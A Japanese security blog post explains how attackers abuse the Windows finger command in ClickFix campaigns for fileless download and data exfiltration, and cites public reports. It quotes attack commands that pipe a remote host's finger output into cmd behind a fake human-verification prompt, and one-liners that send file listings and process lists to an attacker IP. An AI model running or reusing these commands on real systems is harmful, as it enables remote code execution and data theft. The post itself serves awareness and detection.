fingerと言えばユーザ情報取得のために使用するイメージ。実際に使ったことは無いし、誰がどんな状況で使ってたのだろうという思いではあるが、Clickfix系で使われているのを確認されたらしい。
fingerを使ってダウンロードやアップロード
ソースより、
また別のソースより、
cmd /c start "" /min cmd /c "finger vke@finger[.]cloudmega[.]org | cmd" && echo ' Verify you are human--press ENTER '
finger.exeを実行するとユーザ情報が返ってくる。ハズだが、それらを直接cmdに渡すとコマンドとして認識させて実行できる。
ダウンロード時にファイルを保存せずに直でコマンドやプログラムを実行したいときによくやるような手法。これがいわゆるファイルレス。windowsではよくcurlやwget、iwrでやるような方法。これをfingerコマンドで実践している。
リモートサーバに情報を問い合せて表示するという機能を実質的にデータダウンロード手法としている。これは、curlやwget、iwrで明らかに怪しいダウンロードをするよりも検知されにくいダウンロード手法らしい。
確かに、データダウンロードでソースポート79(finger)何て意識したことが無かった。覚えておこう。
fingerでは確認したいユーザ名としてユーザ名を指定してアクセスを行うことがある。これを利用して、確認したいユーザ名の部分を送りたいデータにすれば実質的にデータ送信ツールにすることも可能。
"C:\Windows\System32\cmd.exe" /c for /f "tokens=1" %i in ("dir %TEMP%\\*.txt") do finger %i@185.56.83.82"C:\Windows\System32\cmd.exe" /c for /f "tokens=1" %i in ("tasklist") do finger %i@185.56.83.82
fingerを使ったC2?というのがgithubで公開されている。
github.com
fingerを使った攻撃ツールがDarkFingerということは、もしかしてfingerを使った攻撃の調査ツールはShiningFingerか?
参考
・Decades-old ‘Finger’ protocol abused in ClickFix malware attacks
https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
・Finger | LOLBAS
https://lolbas-project.github.io/lolbas/Binaries/Finger/
・Can’t Touch This: Data Exfiltration via Finger | Huntress
https://www.huntress.com/blog/cant-touch-this-data-exfiltration-via-finger
